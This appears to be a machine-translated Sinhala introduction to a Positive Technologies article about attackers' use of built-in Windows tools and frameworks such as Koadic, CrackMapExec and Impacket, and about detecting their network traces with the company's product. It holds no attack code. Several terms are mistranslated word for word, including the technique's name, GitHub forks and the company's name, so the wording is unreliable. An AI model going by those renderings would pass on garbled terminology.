ඉඩම් ප්‍රවණතාවයෙන් බැහැරව ජීවත්වීම අපරාධකරුවන් අතර ජනප්‍රිය වෙමින් පවතී. ඔවුන් තම අවශ්‍යතා සඳහා වින්ඩෝස් තුළ ගොඩනගා ඇති මෙවලම් සහ යාන්ත්‍රණ භාවිතා කරයි. මෙම මූලධර්මය අනුගමනය කරන ජනප්‍රිය මෙවලම් Koadic, CrackMapExec සහ Impacket වැඩි වැඩියෙන් APT වාර්තාවල දිස්වන ආකාරය අපි දකිමු. මෙම මෙවලම් සඳහා GitHub හි ගෑරුප්පු ගණන ද වර්ධනය වන අතර නව ඒවා දිස් වේ (දැනට දැනටමත් ඒවායින් දහසක් පමණ ඇත). ප්‍රවණතාවය එහි සරල බව නිසා ජනප්‍රිය වෙමින් පවතී: ප්‍රහාරකයන්ට තුන්වන පාර්ශ්ව මෙවලම් අවශ්‍ය නොවේ; ඔවුන් දැනටමත් වින්දිතයන්ගේ යන්ත්‍රවල සිටින අතර ආරක්ෂක පියවර මඟ හැරීමට ඔවුන්ට උපකාර කරයි. අපි ජාල සන්නිවේදනය අධ්‍යයනය කිරීම කෙරෙහි අවධානය යොමු කරමු: ඉහත විස්තර කර ඇති සෑම මෙවලමක්ම ජාල ගමනාගමනය තුළ තමන්ගේම සලකුණු තබයි; ඒවා පිළිබඳ සවිස්තරාත්මක අධ්‍යයනයක් මඟින් අපගේ නිෂ්පාදනය ඉගැන්වීමට අපට හැකි විය PT Network Attack Discovery ඒවා හඳුනාගන්න, අවසානයේදී ඔවුන් සම්බන්ධ සමස්ත සයිබර් සිද්ධි දාමය විමර්ශනය කිරීමට උපකාරී වේ.

කතුවරුන්:

• Anton Tyurin, විශේෂඥ සේවා දෙපාර්තමේන්තුවේ ප්රධානියා, PT විශේෂඥ ආරක්ෂක මධ්යස්ථානය, ධනාත්මක තාක්ෂණයන්
• Egor Podmokov, විශේෂඥ, PT විශේෂඥ ආරක්ෂක මධ්යස්ථානය, ධනාත්මක තාක්ෂණය

මූලාශ්රය: www.habr.com